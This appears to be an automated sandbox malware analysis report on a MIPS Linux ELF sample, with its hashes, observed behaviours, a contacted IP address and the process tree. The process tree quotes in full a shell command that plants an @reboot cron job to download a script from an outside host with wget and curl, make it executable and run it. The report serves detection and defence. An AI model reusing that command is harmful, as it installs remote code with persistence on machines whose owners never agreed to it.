Analysis
-
max time kernel
142s -
max time network
139s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
27-10-2024 02:49
Static task
static1
Behavioral task
behavioral1
Sample
b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf
Resource
debian9-mipsel-20240611-en
General
-
Target
b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf
-
Size
99KB
-
MD5
2ebce2c623cee35100ce645095e0e17a
-
SHA1
f8cf8d0db764834f60325110897e8a7cabc96fc4
-
SHA256
b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840
-
SHA512
1c3591b36a1ba39c07054af82aff3311f56c051399d027e800618831f40b2e0b3f121118dbe4a81eb2ec3f4203b127887e05c7164c3af8afd08b10a12d27d00e
-
SSDEEP
1536:IHC8aIWiD9AW0FLQ4LBOe+h2s9ieZWUHy6Yb7SWTnvgkwBu:IHC8HWMxhlUeSl7wBu
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Renames itself 1 IoCs
Processes:
b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elfpid process 709 b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 168.235.111.72 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.DDLmqg crontab -
Changes its process name 1 IoCs
Processes:
b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elfdescription ioc pid process Changes the process name, possibly in an attempt to hide itself [watchdog/0] 709 b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf -
Processes:
crontabcrontabb9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elfdescription ioc process File opened for reading /proc/filesystems crontab File opened for reading /proc/filesystems crontab File opened for reading /proc/mounts b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf
Processes
-
/tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf/tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf1⤵
- Renames itself
- Changes its process name
- Reads runtime system information
PID:709 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"2⤵
- File and Directory Permissions Modification
PID:711 -
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:713 -
/usr/bin/crontabcrontab -l3⤵
- Reads runtime system information
PID:714
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
306B
MD58c9ff02103c706a091467f66f463d116
SHA18389f2e1cb1e2bb7034773f88119c45482870a46
SHA256e001ff127ebf9d6ceed98f1c5b5326b833864a8473b0e072b64de7315ed8c6f4
SHA512da6e9fa9b71115b07d4e4a561800b89732fc20031c955ad9aa11befda0c2567547aa324fb47ad3db536a9dfb93173352d3c3613124b13ae866ac44d77cf8e555